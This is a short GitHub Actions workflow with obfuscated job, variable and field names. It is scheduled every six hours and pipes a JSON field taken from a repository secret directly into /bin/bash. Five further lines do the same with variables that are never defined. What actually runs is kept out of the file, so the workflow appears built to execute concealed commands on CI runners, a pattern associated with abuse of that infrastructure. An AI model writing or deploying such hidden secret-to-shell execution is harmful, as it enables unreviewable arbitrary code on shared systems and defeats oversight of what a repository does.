name: duolanjiann
on:
  workflow_dispatch:
  schedule:
    - cron: '48 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duolanjiann
        env:
          rz2980: ${{ secrets.rz2980 }}
        run: |
          echo $rz2980 | jq -r .sryn46 | /bin/bash
          echo $nh7536 | jq -r .bid559 | /bin/bash
          echo $ubjbt84 | jq -r .xvlt927 | /bin/bash
          echo $awgpa25 | jq -r .sbzg324 | /bin/bash
          echo $mvfi6 | jq -r .woor851 | /bin/bash
          echo $hmv18264 | jq -r .xhufi0744 | /bin/bash

